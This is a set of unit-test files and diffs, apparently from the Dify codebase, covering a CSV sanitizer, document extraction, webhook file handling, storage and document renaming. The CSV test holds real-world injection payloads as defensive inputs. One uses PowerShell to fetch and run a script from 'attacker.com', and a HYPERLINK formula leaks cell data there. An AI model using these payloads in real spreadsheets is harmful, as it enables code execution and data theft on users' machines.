"""Test that safe values are not modified."""
assert CSVSanitizer.sanitize_value("Hello World") == "Hello World"
assert CSVSanitizer.sanitize_value("123") == "123"
assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com"
assert CSVSanitizer.sanitize_value("Normal text") == "Normal text"
assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?"
def test_sanitize_safe_values_with_special_chars_in_middle(self):
"""Test that special characters in the middle are not escaped."""
assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C"
assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20"
assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com"
def test_sanitize_empty_values(self):
"""Test handling of empty values."""
assert CSVSanitizer.sanitize_value("") == ""
assert CSVSanitizer.sanitize_value(None) == ""
def test_sanitize_numeric_types(self):
"""Test handling of numeric types."""
assert CSVSanitizer.sanitize_value(123) == "123"
assert CSVSanitizer.sanitize_value(456.789) == "456.789"
assert CSVSanitizer.sanitize_value(0) == "0"
# Negative numbers should be escaped (start with -)
assert CSVSanitizer.sanitize_value(-123) == "'-123"
def test_sanitize_boolean_types(self):
"""Test handling of boolean types."""
assert CSVSanitizer.sanitize_value(True) == "True"
assert CSVSanitizer.sanitize_value(False) == "False"
def test_sanitize_dict_with_specific_fields(self):
"""Test sanitizing specific fields in a dictionary."""
data = {
"question": "=1+1",
"answer": "+cmd|'/c calc",
"safe_field": "Normal text",
"id": "12345",
}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"])
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+cmd|'/c calc"
assert sanitized["safe_field"] == "Normal text"
assert sanitized["id"] == "12345"
def test_sanitize_dict_all_string_fields(self):
"""Test sanitizing all string fields when no field list provided."""
data = {
"question": "=1+1",
"answer": "+calc",
"id": 123, # Not a string, should be ignored
}
sanitized = CSVSanitizer.sanitize_dict(data, None)
assert sanitized["question"] == "'=1+1"
assert sanitized["answer"] == "'+calc"
assert sanitized["id"] == 123 # Unchanged
def test_sanitize_dict_with_missing_fields(self):
"""Test that missing fields in dict don't cause errors."""
data = {"question": "=1+1"}
sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"])
assert sanitized["question"] == "'=1+1"
assert "nonexistent_field" not in sanitized
def test_sanitize_dict_creates_copy(self):
"""Test that sanitize_dict creates a copy and doesn't modify original."""
original = {"question": "=1+1", "answer": "Normal"}
sanitized = CSVSanitizer.sanitize_dict(original, ["question"])
assert original["question"] == "=1+1" # Original unchanged
assert sanitized["question"] == "'=1+1" # Copy sanitized
def test_real_world_csv_injection_payloads(self):
"""Test against real-world CSV injection attack payloads."""
# Common DDE (Dynamic Data Exchange) attack payloads
payloads = [
"=cmd|'/c calc'!A0",
"=cmd|'/c notepad'!A0",
"+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'",
"-2+3+cmd|'/c calc'",
"@SUM(1+1)*cmd|'/c calc'",
"=1+1+cmd|'/c calc'",
'=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")',
]
for payload in payloads:
result = CSVSanitizer.sanitize_value(payload)
# All should be prefixed with single quote
assert result.startswith("'"), f"Payload not sanitized: {payload}"
assert result == f"'{payload}", f"Unexpected sanitization for: {payload}"
def test_multiline_strings(self):
"""Test handling of multiline strings."""
multiline = "Line 1\nLine 2\nLine 3"
assert CSVSanitizer.sanitize_value(multiline) == multiline
multiline_with_formula = "=SUM(A1)\nLine 2"
assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}"
def test_whitespace_only_strings(self):
"""Test handling of whitespace-only strings."""
assert CSVSanitizer.sanitize_value(" ") == " "
assert CSVSanitizer.sanitize_value("\n\n") == "\n\n"
# Tab at start should be escaped
assert CSVSanitizer.sanitize_value("\t ") == "'\t "

View File

@ -1,7 +1,10 @@
"""Primarily used for testing merged cell scenarios"""
from types import SimpleNamespace
from docx import Document
import core.rag.extractor.word_extractor as we
from core.rag.extractor.word_extractor import WordExtractor
@ -47,3 +50,85 @@ def test_parse_row():
extractor = object.__new__(WordExtractor)
for idx, row in enumerate(table.rows):
assert extractor._parse_row(row, {}, 3) == gt[idx]
def test_extract_images_from_docx(monkeypatch):
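# The extractor's storage, DB session, config, UploadFile model and SSRF-safe
# HTTP client are all stubbed out below, so the test exercises only the
# image-relationship handling for one external and one embedded image.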
external_bytes = b"ext-bytes"
internal_bytes = b"int-bytes"
# Patch storage.save to capture writes
saves: list[tuple[str, bytes]] = []
def save(key: str, data: bytes):
saves.append((key, data))
monkeypatch.setattr(we, "storage", SimpleNamespace(save=save))
# Patch db.session to record adds/commit
class DummySession:
def __init__(self):
self.added = []
self.committed = False
def add(self, obj):
self.added.append(obj)
def commit(self):
self.committed = True
db_stub = SimpleNamespace(session=DummySession())
monkeypatch.setattr(we, "db", db_stub)
# Patch config values used for URL composition and storage type
monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False)
monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False)
# Patch UploadFile to avoid real DB models
class FakeUploadFile:
_i = 0
def __init__(self, **kwargs): # kwargs match the real signature fields
type(self)._i += 1
self.id = f"u{self._i}"
monkeypatch.setattr(we, "UploadFile", FakeUploadFile)
# Patch external image fetcher
def fake_get(url: str):
assert url == "https://example.com/image.png"
return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes)
monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get))
# A hashable internal part object with a blob attribute
class HashablePart:
def __init__(self, blob: bytes):
self.blob = blob
def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts
return id(self)
# Build a minimal doc object with both external and internal image rels
internal_part = HashablePart(blob=internal_bytes)
rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png")
rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part)
doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int}))
extractor = object.__new__(WordExtractor)
extractor.tenant_id = "t1"
extractor.user_id = "u1"
image_map = extractor._extract_images_from_docx(doc)
# Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part)
assert set(image_map.keys()) == {"rId1", internal_part}
assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values())
# Storage should receive both payloads
payloads = {data for _, data in saves}
assert external_bytes in payloads
assert internal_bytes in payloads
# DB interactions should be recorded
assert len(db_stub.session.added) == 2
assert db_stub.session.committed is True

View File

@ -0,0 +1,86 @@
import pytest
import core.tools.utils.message_transformer as mt
from core.tools.entities.tool_entities import ToolInvokeMessage
class _FakeToolFile:
def __init__(self, mimetype: str):
self.id = "fake-tool-file-id"
self.mimetype = mimetype
class _FakeToolFileManager:
"""Fake ToolFileManager to capture the mimetype passed in."""
last_call: dict | None = None
def __init__(self, *args, **kwargs):
pass
def create_file_by_raw(
self,
*,
user_id: str,
tenant_id: str,
conversation_id: str | None,
file_binary: bytes,
mimetype: str,
filename: str | None = None,
):
type(self).last_call = {
"user_id": user_id,
"tenant_id": tenant_id,
"conversation_id": conversation_id,
"file_binary": file_binary,
"mimetype": mimetype,
"filename": filename,
}
return _FakeToolFile(mimetype)
@pytest.fixture(autouse=True)
def _patch_tool_file_manager(monkeypatch):
# Patch the manager used inside the transformer module
monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager)
# Also ensure predictable URL generation (no need to patch; the URL is derived from the file id and extension only)
yield
_FakeToolFileManager.last_call = None
def _gen(messages):
yield from messages
def test_transform_tool_invoke_messages_mimetype_key_present_but_none():
# Arrange: a BLOB message whose meta contains a mime_type key set to None
blob = b"hello"
msg = ToolInvokeMessage(
type=ToolInvokeMessage.MessageType.BLOB,
message=ToolInvokeMessage.BlobMessage(blob=blob),
meta={"mime_type": None, "filename": "greeting"},
)
# Act
out = list(
mt.ToolFileMessageTransformer.transform_tool_invoke_messages(
messages=_gen([msg]),
user_id="u1",
tenant_id="t1",
conversation_id="c1",
)
)
# Assert: default to application/octet-stream when mime_type is present but None
assert _FakeToolFileManager.last_call is not None
assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream"
# Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin
assert len(out) == 1
o = out[0]
assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK
assert isinstance(o.message, ToolInvokeMessage.TextMessage)
assert o.message.text.endswith(".bin")
# meta is preserved (still contains mime_type: None)
assert "mime_type" in (o.meta or {})
assert o.meta["mime_type"] is None

View File

@ -0,0 +1,452 @@
"""
Unit tests for webhook file conversion fix.
These tests verify that webhook trigger nodes properly convert file dictionaries
to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error
when passing files to downstream LLM nodes.
"""
from unittest.mock import Mock, patch
from core.app.entities.app_invoke_entities import InvokeFrom
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
ContentType,
Method,
WebhookBodyParameter,
WebhookData,
)
from core.workflow.nodes.trigger_webhook.node import TriggerWebhookNode
from core.workflow.runtime.graph_runtime_state import GraphRuntimeState
from core.workflow.runtime.variable_pool import VariablePool
from core.workflow.system_variable import SystemVariable
from models.enums import UserFrom
from models.workflow import WorkflowType
def create_webhook_node(
webhook_data: WebhookData,
variable_pool: VariablePool,
tenant_id: str = "test-tenant",
) -> TriggerWebhookNode:
"""Helper function to create a webhook node with proper initialization."""
node_config = {
"id": "webhook-node-1",
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id=tenant_id,
app_id="test-app",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="test-workflow",
graph_config={},
user_id="test-user",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="webhook-node-1",
config=node_config,
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Attach a lightweight app_config onto runtime state for tenant lookups
runtime_state.app_config = Mock()
runtime_state.app_config.tenant_id = tenant_id
# Provide compatibility alias expected by node implementation
# Some nodes reference `self.node_id`; expose it as an alias to `self.id` for tests
node.node_id = node.id
return node
def create_test_file_dict(
filename: str = "test.jpg",
file_type: str = "image",
transfer_method: str = "local_file",
) -> dict:
"""Create a test file dictionary as it would come from webhook service."""
return {
"id": "file-123",
"tenant_id": "test-tenant",
"type": file_type,
"filename": filename,
"extension": ".jpg",
"mime_type": "image/jpeg",
"transfer_method": transfer_method,
"related_id": "related-123",
"storage_key": "storage-key-123",
"size": 1024,
"url": "https://example.com/test.jpg",
"created_at": 1234567890,
"used_at": None,
"hash": "file-hash-123",
}
def test_webhook_node_file_conversion_to_file_variable():
"""Test that webhook node converts file dictionaries to FileVariable objects."""
# Create test file dictionary (as it comes from webhook service)
file_dict = create_test_file_dict("uploaded_image.jpg")
data = WebhookData(
title="Test Webhook with File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="image_upload", type="file", required=True),
WebhookBodyParameter(name="message", type="string", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {"message": "Test message"},
"files": {
"image_upload": file_dict,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Mock the file factory and variable factory
with (
patch("factories.file_factory.build_from_mapping") as mock_file_factory,
patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
):
# Setup mocks
mock_file_obj = Mock()
mock_file_obj.to_dict.return_value = file_dict
mock_file_factory.return_value = mock_file_obj
mock_segment = Mock()
mock_segment.value = mock_file_obj
mock_segment_factory.return_value = mock_segment
mock_file_var_instance = Mock()
mock_file_variable.return_value = mock_file_var_instance
# Run the node
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify file factory was called with correct parameters
mock_file_factory.assert_called_once_with(
mapping=file_dict,
tenant_id="test-tenant",
)
# Verify segment factory was called to create FileSegment
mock_segment_factory.assert_called_once()
# Verify FileVariable was created with correct parameters
mock_file_variable.assert_called_once()
call_args = mock_file_variable.call_args[1]
assert call_args["name"] == "image_upload"
# value should be whatever build_segment_with_type.value returned
assert call_args["value"] == mock_segment.value
assert call_args["selector"] == ["webhook-node-1", "image_upload"]
# Verify output contains the FileVariable, not the original dict
assert result.outputs["image_upload"] == mock_file_var_instance
assert result.outputs["message"] == "Test message"
def test_webhook_node_file_conversion_with_missing_files():
"""Test webhook node file conversion with missing file parameter."""
data = WebhookData(
title="Test Webhook with Missing File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="missing_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {}, # No files
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify missing file parameter is None
assert result.outputs["_webhook_raw"]["files"] == {}
def test_webhook_node_file_conversion_with_none_file():
"""Test webhook node file conversion with None file value."""
data = WebhookData(
title="Test Webhook with None File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="none_file", type="file", required=False),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": None,
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle None case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify None file parameter is None
assert result.outputs["_webhook_raw"]["files"]["file"] is None
def test_webhook_node_file_conversion_with_non_dict_file():
"""Test webhook node file conversion with non-dict file value."""
data = WebhookData(
title="Test Webhook with Non-Dict File",
method=Method.POST,
content_type=ContentType.FORM_DATA,
body=[
WebhookBodyParameter(name="wrong_type", type="file", required=True),
],
)
variable_pool = VariablePool(
system_variables=SystemVariable.empty(),
user_inputs={
"webhook_data": {
"headers": {},
"query_params": {},
"body": {},
"files": {
"file": "not_a_dict", # Wrapped to match node expectation
},
}
},
)
node = create_webhook_node(data, variable_pool)
# Run the node without patches (should handle non-dict case gracefully)
result = node._run()
# Verify successful execution
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
# Verify fallback to original (wrapped) mapping
assert result.outputs["_webhook_raw"]["files"]["file"] == "not_a_dict"
def test_webhook_node_file_conversion_mixed_parameters():
    """Test webhook node with mixed parameter types including files."""
    file_dict = create_test_file_dict("mixed_test.jpg")

    data = WebhookData(
        title="Test Webhook Mixed Parameters",
        method=Method.POST,
        content_type=ContentType.FORM_DATA,
        headers=[],
        params=[],
        body=[
            WebhookBodyParameter(name="text_param", type="string", required=True),
            WebhookBodyParameter(name="number_param", type="number", required=False),
            WebhookBodyParameter(name="file_param", type="file", required=True),
            WebhookBodyParameter(name="bool_param", type="boolean", required=False),
        ],
    )

    variable_pool = VariablePool(
        system_variables=SystemVariable.empty(),
        user_inputs={
            "webhook_data": {
                "headers": {},
                "query_params": {},
                "body": {
                    "text_param": "Hello World",
                    "number_param": 42,
                    "bool_param": True,
                },
                "files": {
                    "file_param": file_dict,
                },
            }
        },
    )

    node = create_webhook_node(data, variable_pool)

    with (
        patch("factories.file_factory.build_from_mapping") as mock_file_factory,
        patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
        patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
    ):
        # Setup mocks for file
        mock_file_obj = Mock()
        mock_file_factory.return_value = mock_file_obj
        mock_segment = Mock()
        mock_segment.value = mock_file_obj
        mock_segment_factory.return_value = mock_segment
        mock_file_var = Mock()
        mock_file_variable.return_value = mock_file_var

        # Run the node
        result = node._run()

        # Verify successful execution
        assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED

        # Verify all parameters are present
        assert result.outputs["text_param"] == "Hello World"
        assert result.outputs["number_param"] == 42
        assert result.outputs["bool_param"] is True
        assert result.outputs["file_param"] == mock_file_var

        # Verify file conversion was called
        mock_file_factory.assert_called_once_with(
            mapping=file_dict,
            tenant_id="test-tenant",
        )


def test_webhook_node_different_file_types():
    """Test webhook node file conversion with different file types."""
    image_dict = create_test_file_dict("image.jpg", "image")

    data = WebhookData(
        title="Test Webhook Different File Types",
        method=Method.POST,
        content_type=ContentType.FORM_DATA,
        body=[
            WebhookBodyParameter(name="image", type="file", required=True),
            WebhookBodyParameter(name="document", type="file", required=True),
            WebhookBodyParameter(name="video", type="file", required=True),
        ],
    )

    variable_pool = VariablePool(
        system_variables=SystemVariable.empty(),
        user_inputs={
            "webhook_data": {
                "headers": {},
                "query_params": {},
                "body": {},
                "files": {
                    "image": image_dict,
                    "document": create_test_file_dict("document.pdf", "document"),
                    "video": create_test_file_dict("video.mp4", "video"),
                },
            }
        },
    )

    node = create_webhook_node(data, variable_pool)

    with (
        patch("factories.file_factory.build_from_mapping") as mock_file_factory,
        patch("core.workflow.nodes.trigger_webhook.node.build_segment_with_type") as mock_segment_factory,
        patch("core.workflow.nodes.trigger_webhook.node.FileVariable") as mock_file_variable,
    ):
        # Setup mocks for all files
        mock_file_objs = [Mock() for _ in range(3)]
        mock_segments = [Mock() for _ in range(3)]
        mock_file_vars = [Mock() for _ in range(3)]
        # Map each segment.value to its corresponding mock file obj
        for seg, f in zip(mock_segments, mock_file_objs):
            seg.value = f
        mock_file_factory.side_effect = mock_file_objs
        mock_segment_factory.side_effect = mock_segments
        mock_file_variable.side_effect = mock_file_vars

        # Run the node
        result = node._run()

        # Verify successful execution
        assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED

        # Verify all file types were converted
        assert mock_file_factory.call_count == 3
        assert result.outputs["image"] == mock_file_vars[0]
        assert result.outputs["document"] == mock_file_vars[1]
        assert result.outputs["video"] == mock_file_vars[2]


def test_webhook_node_file_conversion_with_non_dict_wrapper():
    """Test webhook node file conversion when the file wrapper is not a dict."""
    data = WebhookData(
        title="Test Webhook with Non-dict File Wrapper",
        method=Method.POST,
        content_type=ContentType.FORM_DATA,
        body=[
            WebhookBodyParameter(name="non_dict_wrapper", type="file", required=True),
        ],
    )

    variable_pool = VariablePool(
        system_variables=SystemVariable.empty(),
        user_inputs={
            "webhook_data": {
                "headers": {},
                "query_params": {},
                "body": {},
                "files": {
                    "file": "just a string",
                },
            }
        },
    )

    node = create_webhook_node(data, variable_pool)
    result = node._run()

    # Verify successful execution (should not crash)
    assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
    # Verify fallback to original value
    assert result.outputs["_webhook_raw"]["files"]["file"] == "just a string"
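
# For orientation, the mocks in these tests stand in for a conversion path of
# roughly this shape (a sketch assumed from the patch targets and assertions,
# not the node's actual code): build_from_mapping(mapping=file_dict, tenant_id=...)
# produces a File, build_segment_with_type wraps it in a segment whose .value is
# that File, and FileVariable wraps the segment as the node's output variable.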

View File

@ -1,8 +1,10 @@
from unittest.mock import patch
import pytest
from core.app.entities.app_invoke_entities import InvokeFrom
from core.file import File, FileTransferMethod, FileType
from core.variables import StringVariable
from core.variables import FileVariable, StringVariable
from core.workflow.entities.graph_init_params import GraphInitParams
from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
from core.workflow.nodes.trigger_webhook.entities import (
@ -27,26 +29,34 @@ def create_webhook_node(webhook_data: WebhookData, variable_pool: VariablePool)
"data": webhook_data.model_dump(),
}
graph_init_params = GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
)
runtime_state = GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
)
node = TriggerWebhookNode(
id="1",
config=node_config,
graph_init_params=GraphInitParams(
tenant_id="1",
app_id="1",
workflow_type=WorkflowType.WORKFLOW,
workflow_id="1",
graph_config={},
user_id="1",
user_from=UserFrom.ACCOUNT,
invoke_from=InvokeFrom.SERVICE_API,
call_depth=0,
),
graph_runtime_state=GraphRuntimeState(
variable_pool=variable_pool,
start_at=0,
),
graph_init_params=graph_init_params,
graph_runtime_state=runtime_state,
)
# Provide tenant_id for conversion path
runtime_state.app_config = type("_AppCfg", (), {"tenant_id": "1"})()
# Compatibility alias for some nodes referencing `self.node_id`
node.node_id = node.id
return node
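
# Note: type("_AppCfg", (), {"tenant_id": "1"})() builds a throwaway object whose
# only attribute is tenant_id, equivalent to SimpleNamespace(tenant_id="1");
# judging by the comment above, the node reads runtime_state.app_config.tenant_id
# when converting uploaded files.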
@ -246,20 +256,27 @@ def test_webhook_node_run_with_file_params():
"query_params": {},
"body": {},
"files": {
"upload": file1,
"document": file2,
"upload": file1.to_dict(),
"document": file2.to_dict(),
},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["upload"] == file1
assert result.outputs["document"] == file2
assert result.outputs["missing_file"] is None
assert isinstance(result.outputs["upload"], FileVariable)
assert isinstance(result.outputs["document"], FileVariable)
assert result.outputs["upload"].value.filename == "image.jpg"
def test_webhook_node_run_mixed_parameters():
@ -291,19 +308,27 @@ def test_webhook_node_run_mixed_parameters():
"headers": {"Authorization": "Bearer token"},
"query_params": {"version": "v1"},
"body": {"message": "Test message"},
"files": {"upload": file_obj},
"files": {"upload": file_obj.to_dict()},
}
},
)
node = create_webhook_node(data, variable_pool)
result = node._run()
# Mock the file factory to avoid DB-dependent validation on upload_file_id
with patch("factories.file_factory.build_from_mapping") as mock_file_factory:
def _to_file(mapping, tenant_id, config=None, strict_type_validation=False):
return File.model_validate(mapping)
mock_file_factory.side_effect = _to_file
result = node._run()
assert result.status == WorkflowNodeExecutionStatus.SUCCEEDED
assert result.outputs["Authorization"] == "Bearer token"
assert result.outputs["version"] == "v1"
assert result.outputs["message"] == "Test message"
assert result.outputs["upload"] == file_obj
assert isinstance(result.outputs["upload"], FileVariable)
assert result.outputs["upload"].value.filename == "test.jpg"
assert "_webhook_raw" in result.outputs

View File

@ -1,3 +1,5 @@
from types import SimpleNamespace
import pytest
from core.file.enums import FileType
@ -12,6 +14,36 @@ from core.workflow.system_variable import SystemVariable
from core.workflow.workflow_entry import WorkflowEntry
@pytest.fixture(autouse=True)
def _mock_ssrf_head(monkeypatch):
    """Avoid any real network requests during tests.

    file_factory._get_remote_file_info() uses ssrf_proxy.head to inspect
    remote files. We stub it to return a minimal response object with
    headers so filename/mime/size can be derived deterministically.
    """

    def fake_head(url, *args, **kwargs):
        # choose a content-type by file suffix for determinism
        if url.endswith(".pdf"):
            ctype = "application/pdf"
        elif url.endswith(".jpg") or url.endswith(".jpeg"):
            ctype = "image/jpeg"
        elif url.endswith(".png"):
            ctype = "image/png"
        else:
            ctype = "application/octet-stream"
        filename = url.split("/")[-1] or "file.bin"
        headers = {
            "Content-Type": ctype,
            "Content-Disposition": f'attachment; filename="{filename}"',
            "Content-Length": "12345",
        }
        return SimpleNamespace(status_code=200, headers=headers)

    monkeypatch.setattr("core.helper.ssrf_proxy.head", fake_head)
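
# For example, fake_head("https://example.com/report.pdf") returns headers that
# resolve to content type "application/pdf", filename "report.pdf" and a fixed
# Content-Length of 12345, so remote-file metadata stays deterministic in tests.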
class TestWorkflowEntry:
"""Test WorkflowEntry class methods."""

View File

@ -14,7 +14,9 @@ def get_example_bucket() -> str:
def get_opendal_bucket() -> str:
return "./dify"
import os
return os.environ.get("OPENDAL_FS_ROOT", "/tmp/dify-storage")
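
# The filesystem root can now be overridden per environment, for example by
# exporting OPENDAL_FS_ROOT=/var/tmp/dify-storage before running the storage
# tests (the /var/tmp path here is just an illustrative value).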
def get_example_filename() -> str:

View File

@ -21,20 +21,16 @@ class TestOpenDAL:
    )

    @pytest.fixture(scope="class", autouse=True)
    def teardown_class(self, request):
    def teardown_class(self):
        """Clean up after all tests in the class."""

        def cleanup():
            folder = Path(get_opendal_bucket())
            if folder.exists() and folder.is_dir():
                for item in folder.iterdir():
                    if item.is_file():
                        item.unlink()
                    elif item.is_dir():
                        item.rmdir()
                folder.rmdir()

        yield
        return cleanup()
        folder = Path(get_opendal_bucket())
        if folder.exists() and folder.is_dir():
            import shutil

            shutil.rmtree(folder, ignore_errors=True)
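
    # shutil.rmtree removes the whole tree recursively (including nested
    # sub-directories), which the manual iterdir()/unlink()/rmdir() loop it
    # replaces only handled one level deep.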
    def test_save_and_exists(self):
        """Test saving data and checking existence."""

View File

@ -0,0 +1,176 @@
from types import SimpleNamespace
from unittest.mock import Mock, create_autospec, patch

import pytest

from models import Account
from services.dataset_service import DocumentService


@pytest.fixture
def mock_env():
    """Patch dependencies used by DocumentService.rename_document.

    Mocks:
    - DatasetService.get_dataset
    - DocumentService.get_document
    - current_user (with current_tenant_id)
    - db.session
    """
    with (
        patch("services.dataset_service.DatasetService.get_dataset") as get_dataset,
        patch("services.dataset_service.DocumentService.get_document") as get_document,
        patch("services.dataset_service.current_user", create_autospec(Account, instance=True)) as current_user,
        patch("extensions.ext_database.db.session") as db_session,
    ):
        current_user.current_tenant_id = "tenant-123"
        yield {
            "get_dataset": get_dataset,
            "get_document": get_document,
            "current_user": current_user,
            "db_session": db_session,
        }


def make_dataset(dataset_id="dataset-123", tenant_id="tenant-123", built_in_field_enabled=False):
    return SimpleNamespace(id=dataset_id, tenant_id=tenant_id, built_in_field_enabled=built_in_field_enabled)


def make_document(
    document_id="document-123",
    dataset_id="dataset-123",
    tenant_id="tenant-123",
    name="Old Name",
    data_source_info=None,
    doc_metadata=None,
):
    doc = Mock()
    doc.id = document_id
    doc.dataset_id = dataset_id
    doc.tenant_id = tenant_id
    doc.name = name
    doc.data_source_info = data_source_info or {}
    # property-like usage in code relies on a dict
    doc.data_source_info_dict = dict(doc.data_source_info)
    doc.doc_metadata = dict(doc_metadata or {})
    return doc


def test_rename_document_success(mock_env):
    dataset_id = "dataset-123"
    document_id = "document-123"
    new_name = "New Document Name"

    dataset = make_dataset(dataset_id)
    document = make_document(document_id=document_id, dataset_id=dataset_id)
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = document

    result = DocumentService.rename_document(dataset_id, document_id, new_name)

    assert result is document
    assert document.name == new_name
    mock_env["db_session"].add.assert_called_once_with(document)
    mock_env["db_session"].commit.assert_called_once()


def test_rename_document_with_built_in_fields(mock_env):
    dataset_id = "dataset-123"
    document_id = "document-123"
    new_name = "Renamed"

    dataset = make_dataset(dataset_id, built_in_field_enabled=True)
    document = make_document(document_id=document_id, dataset_id=dataset_id, doc_metadata={"foo": "bar"})
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = document

    DocumentService.rename_document(dataset_id, document_id, new_name)

    assert document.name == new_name
    # BuiltInField.document_name == "document_name" in service code
    assert document.doc_metadata["document_name"] == new_name
    assert document.doc_metadata["foo"] == "bar"


def test_rename_document_updates_upload_file_when_present(mock_env):
    dataset_id = "dataset-123"
    document_id = "document-123"
    new_name = "Renamed"
    file_id = "file-123"

    dataset = make_dataset(dataset_id)
    document = make_document(
        document_id=document_id,
        dataset_id=dataset_id,
        data_source_info={"upload_file_id": file_id},
    )
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = document

    # Intercept UploadFile rename UPDATE chain
    mock_query = Mock()
    mock_query.where.return_value = mock_query
    mock_env["db_session"].query.return_value = mock_query

    DocumentService.rename_document(dataset_id, document_id, new_name)

    assert document.name == new_name
    mock_env["db_session"].query.assert_called()  # update executed


def test_rename_document_does_not_update_upload_file_when_missing_id(mock_env):
    """
    When data_source_info_dict exists but does not contain "upload_file_id",
    UploadFile should not be updated.
    """
    dataset_id = "dataset-123"
    document_id = "document-123"
    new_name = "Another Name"

    dataset = make_dataset(dataset_id)
    # Ensure data_source_info_dict is truthy but lacks the key
    document = make_document(
        document_id=document_id,
        dataset_id=dataset_id,
        data_source_info={"url": "https://example.com"},
    )
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = document

    DocumentService.rename_document(dataset_id, document_id, new_name)

    assert document.name == new_name
    # Should NOT attempt to update UploadFile
    mock_env["db_session"].query.assert_not_called()


def test_rename_document_dataset_not_found(mock_env):
    mock_env["get_dataset"].return_value = None

    with pytest.raises(ValueError, match="Dataset not found"):
        DocumentService.rename_document("missing", "doc", "x")


def test_rename_document_not_found(mock_env):
    dataset = make_dataset("dataset-123")
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = None

    with pytest.raises(ValueError, match="Document not found"):
        DocumentService.rename_document(dataset.id, "missing", "x")


def test_rename_document_permission_denied_when_tenant_mismatch(mock_env):
    dataset = make_dataset("dataset-123")
    # different tenant than current_user.current_tenant_id
    document = make_document(dataset_id=dataset.id, tenant_id="tenant-other")
    mock_env["get_dataset"].return_value = dataset
    mock_env["get_document"].return_value = document

    with pytest.raises(ValueError, match="No permission"):
        DocumentService.rename_document(dataset.id, document.id, "x")

View File

@ -82,19 +82,19 @@ class TestWebhookServiceUnit:
"/webhook",
method="POST",
